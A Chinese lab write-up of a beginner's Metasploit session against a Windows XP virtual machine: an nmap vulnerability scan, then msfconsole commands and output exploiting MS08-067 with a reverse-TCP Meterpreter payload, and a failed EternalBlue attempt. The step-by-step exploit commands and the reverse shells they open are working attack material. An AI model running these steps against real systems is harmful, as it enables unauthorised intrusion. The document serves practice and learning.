msf初体验——xp的ms08-067漏洞
环境:
kali2019:192.168.1.128
xp32位:192.168.1.129
都是nat模式
扫描靶机漏洞
1.nmap扫描(不知道目标漏洞名称),个人感觉有点慢,应该是配置太垃圾
nmap --script=vuln 192.168.1.129
nmap扫描报告,扫到两个,ms08-067和ms17-010
Nmap scan report for 192.168.1.129
Host is up (0.00053s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
25/tcp open smtp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| ASPSESSIONIDSSSATQRD:
|_ httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /printers/: Potentially interesting folder (401 Access Denied)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
443/tcp open https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp open multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
6002/tcp open X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
31337/tcp open Elite
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:2F:C1:31 (VMware)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 481.80 seconds
2.msf辅助模块扫描(扫描靶机是否有该漏洞,而且有些漏洞并没有辅助模块可以扫描,比如这个漏洞,永恒之蓝就有辅助模块)
渗透攻击
进入msfconsole(进入后敲help可以看各种命令的使用)
root@kali:~/桌面# msfconsole -q
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
搜索已知漏洞,并使用该攻击模块
msf5 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 > use 0
使用逆向tcp的payload,其中标为yes的是需要设置的参数
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
rhost是靶机ip,lhost是监听者ip,lport是监听的端口
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.129
rhost => 192.168.1.129
msf5 exploit(windows/smb/ms08_067_netapi) > set lport 6666
lport => 6666
run/exploit,执行攻击
msf5 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.1.128:6666
[*] 192.168.1.129:445 - Automatically detecting the target...
[*] Sending stage (180291 bytes) to 192.168.1.129
[*] Meterpreter session 1 opened (192.168.1.128:6666 -> 192.168.1.129:4310) at 2020-09-07 22:31:14 +0800
[*] Sending stage (180291 bytes) to 192.168.1.1
[*] Meterpreter session 2 opened (192.168.1.128:6666 -> 192.168.1.1:56268) at 2020-09-07 22:31:15 +0800
[*] 192.168.1.129:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.129:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.129:445 - Attempting to trigger the vulnerability...
meterpreter >
拿到权限,这个漏洞还是很好打的,不过我永恒之蓝总是打失败(靶机防火墙已关,但从未成功过,打蓝屏都不成功的那种),有大佬可以瞅瞅嘛
root@kali:~/桌面# msfconsole -q
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use 3
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.129
rhost => 192.168.1.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.128:4444
[+] 192.168.1.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 192.168.1.129:445 - Connecting to target for exploitation.
[+] 192.168.1.129:445 - Connection established for exploitation.
[+] 192.168.1.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.129:445 - CORE raw buffer dump (11 bytes)
[*] 192.168.1.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 192.168.1.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.129:445 - Starting non-paged pool grooming
[+] 192.168.1.129:445 - Sending SMBv2 buffers
[+] 192.168.1.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.129:445 - Sending final SMBv2 buffers.
[*] 192.168.1.129:445 - Sending last fragment of exploit packet!
[*] 192.168.1.129:445 - Receiving response from exploit packet
[+] 192.168.1.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.129:445 - Sending egg to corrupted connection.
[*] 192.168.1.129:445 - Triggering free of corrupted buffer.
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.129:445 - Connecting to target for exploitation.
[+] 192.168.1.129:445 - Connection established for exploitation.
[+] 192.168.1.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.129:445 - CORE raw buffer dump (11 bytes)
[*] 192.168.1.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 192.168.1.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.129:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.129:445 - Starting non-paged pool grooming
[+] 192.168.1.129:445 - Sending SMBv2 buffers
[+] 192.168.1.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.129:445 - Sending final SMBv2 buffers.
[*] 192.168.1.129:445 - Sending last fragment of exploit packet!
[*] 192.168.1.129:445 - Receiving response from exploit packet
[+] 192.168.1.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.129:445 - Sending egg to corrupted connection.
[*] 192.168.1.129:445 - Triggering free of corrupted buffer.
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.129:445 - Connecting to target for exploitation.
[+] 192.168.1.129:445 - Connection established for exploitation.
[+] 192.168.1.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.129:445 - CORE raw buffer dump (11 bytes)
[*] 192.168.1.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 192.168.1.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.129:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.1.129:445 - Sending all but last fragment of exploit packet
[-] 192.168.1.129:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >